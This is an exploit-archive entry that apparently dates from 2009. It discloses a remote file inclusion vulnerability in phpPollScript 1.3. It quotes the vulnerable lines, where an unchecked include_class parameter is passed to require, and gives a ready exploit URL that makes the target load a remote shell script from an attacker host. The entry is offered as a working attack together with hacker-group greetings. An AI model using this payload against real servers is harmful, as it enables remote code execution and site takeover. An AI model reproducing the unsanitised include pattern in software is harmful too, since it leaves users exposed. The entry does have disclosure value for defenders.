id: 5777
date: 09/15/2009
title: phpPollScript <= 1.3 (include_class) Remote File Inclusion Vulnerability
author: cr4wl3r
cves: 

========================================================================
phpPollScript <= 1.3 (include_class) Remote File Inclusion Vulnerability
========================================================================


########################################################################
#phpPollScript <= 1.3 Remote File Include Vulnerability
#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
#Author               :  cr4wl3r 
#Location             :  Gorontalo - INDONESIA
########################################################################
#file :
#  init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://attacker.com/shell.txt/test/
########################################################################
#Greetz        : MyMom [alm]
#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################




#  0day.today [2023-03-23]  #